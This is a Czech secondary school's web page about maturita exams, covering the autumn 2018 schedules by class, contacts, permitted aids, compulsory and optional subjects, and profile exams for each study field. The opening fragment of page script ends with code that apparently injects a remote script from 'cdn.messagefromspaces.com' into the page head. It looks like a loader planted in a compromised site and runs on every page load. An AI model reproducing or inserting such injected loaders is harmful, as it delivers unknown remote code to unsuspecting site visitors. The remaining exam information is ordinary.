, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

Maturita

Maturita ve školním roce 2017/2018

Aktuálně

Kontakt pro maturanty pro řešení naléhavých situací: 730 570 732.

Organizace podzimních maturitních zkoušek na škole.

Praktická zkouška z odborných předmětů: 4.MA, 4.MB a 4.OP
Začátek praktické zkoušky je v oba dva dny, tj. 7. a 10. 9. 2018 v 7:00. Maturanti musí být připraveni na dílnách odborného výcviku v 6:45.

Písemná zkouška z odborných předmětů: 3.DP
Začátek písemné zkoušky z odborných předmětů třídy 3.DP je 10. 9. 2018 v 8:00. Dostavte se s dostatečnou časovou rezervou.

Ústní část maturitních zkoušek, zahájení:

2.NE – 11. 9. 2018  v 7:30
3.DE – 11. 9. 2018  v 7:30
4.MB – 11. 9. 2018  v 7:30
4.MA – 11. 9. 2018  v 7:30

4.OP – 12. 9. 2018 v 7:30

3.DP – 14. 9. 2018  v 7:30

Kdy přestávají být žáci posledního maturitního ročníku žáky školy?
Žáci přestávají být žáky školy dnem následujícím po dni, v němž úspěšně vykonali poslední zkoušku maturitní zkoušky (§75, odst. 3 Školský zákon).
Nevykonal-li žák úspěšně maturitní zkoušku v řádném termínu, přestává být žákem školy 30. června roku, v němž měl vzdělávání řádně ukončit (§75, odst. 3 Školský zákon).

Dotazy

V případě dotazů kontaktujte zástupce ředitele Ing. Radima Truchlého
e-mail: truchly@sse-najizdarne.cz
telefon: 556 205 245

Důležité odkazy

Oficiální stránky: http:www.novamaturita.cz.
Výsledkový portál žáka: https://vpz.cermat.cz/Info/Uvod.aspx.
Facebook: https://cs-cz.facebook.com/udelammaturitu/.

Maturita podzim 2018

Maturitní kalendář zde.

Přihláška k maturitní zkoušce – již proběhlo.

Výpis z přihlášky -již proběhlo

Písemná část společné části maturitní zkoušky – jednotné zkušební schéma zde.

Ústní část společné části a profilová část maturitní zkoušky zde.

Povolené pomůcky k písemným pracím a didaktickým testům společné části maturitní zkoušky

Přehled povolených pomůcek naleznete na tomto odkazu.

Povolené pomůcky k maturitní zkoušce můžete odevzdat ke kontrole:

Společná část maturitní zkoušky

2 povinné zkoušky:

  1. český jazyk a literatura
  2. cizí jazyk nebo matematika

Nabídka cizích jazyků k maturitní zkoušce: anglický jazyk a německý jazyk.

Maximálně 2 nepovinné zkoušky:

cizí jazyk nebo matematika.

Seznam literárních děl pro ústní část zkoušky českého jazyka a literatury – zde.
Formulář pro výběr 20 literárních děl – zde.

Seznam témat pro 3. části pracovních listů z anglického jazyka – zde.
Seznam témat pro 3. části pracovních listů z německého jazyka – zde.

Seznam zkoušek profilové části pro jednotlivé obory:

Všichni žáci mají možnost přihlásit se k centrálně spravované profilové zkoušce Matematika+

 26-41-L/01 Mechanik elektrotechnik – Počítačové a zabezpečovací systémy:

Zkouška z Odborného výcviku formou praktické zkoušky (kritéria hodnocení).

Zkouška z Odborných předmětů formou ústní zkoušky. Témata ústní zkoušky z Odborných předmětů jsou zde, kritéria hodnocení.

26-41-L/01 Mechanik elektrotechnik – Elektrotechnická zařízení:

Zkouška z Odborného výcviku formou praktické zkoušky (kritéria hodnocení).

Zkouška z Odborných předmětů formou ústní zkoušky. Témata ústní zkoušky z Odborných předmětů jsou zde, kritéria hodnocení.

 23-62-L/01 Optik

Zkouška z Odborného výcviku formou praktické zkoušky (kritéria hodnocení).

Zkouška z Odborných předmětů formou ústní zkoušky. Témata ústní zkoušky z Odborných předmětů jsou zde, kritéria hodnocení.

26-41-L/52 Provozní elektrotechnika – denní a dálková forma

Zkouška z Obecné elektrotechniky formou ústní zkoušky. Témata ústní zkoušky z Obecné elektrotechniky jsou zdekritéria hodnocení.

Zkouška z Využití elektrické energie formou ústní zkoušky. Témata ústní zkoušky z Využití elektrické energie jsou zdekritéria hodnocení.

64-41-L/51 Podnikání

Zkoušky z Odborných předmětů formou praktické zkoušky, kritéria hodnocení.

Zkouška z Ekonomiky a řízení formou ústní zkoušky. Témata ústní zkoušky z Ekonomiky a řízení jsou zdekritéria hodnocení.

Zkouška z Účetnictví a marketingu formou ústní zkoušky. Témata ústní zkoušky z Účetnictví a marketingu jsou zdekritéria hodnocení.